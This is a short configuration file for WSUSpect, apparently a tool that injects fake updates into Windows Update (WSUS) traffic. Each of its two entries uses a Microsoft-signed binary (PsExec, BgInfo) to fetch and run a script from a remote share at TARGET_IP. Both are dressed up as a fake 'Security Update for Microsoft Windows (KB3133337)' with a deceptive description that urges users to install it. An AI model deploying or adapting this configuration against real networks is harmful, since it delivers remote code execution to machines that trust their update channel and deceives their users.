# WSUSpect payload parameters 
# Place MS-signed update binaries in the same directory as this file 

[psexec]
payload = PsExec.exe
args = /accepteula cmd.exe /c cscript \\TARGET_IP\update\script.vbs
title = Security Update for Microsoft Windows (KB3133337)
description = A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft.

[bginfo]
payload = BgInfo.exe
args = \\TARGET_IP\update\script.bgi /nolicprompt /timer:0
title = Security Update for Microsoft Windows (KB3133337)
description = A security issue has been identified in a Microsoft software product that could affect your system. You can help protect your system by installing this update from Microsoft.
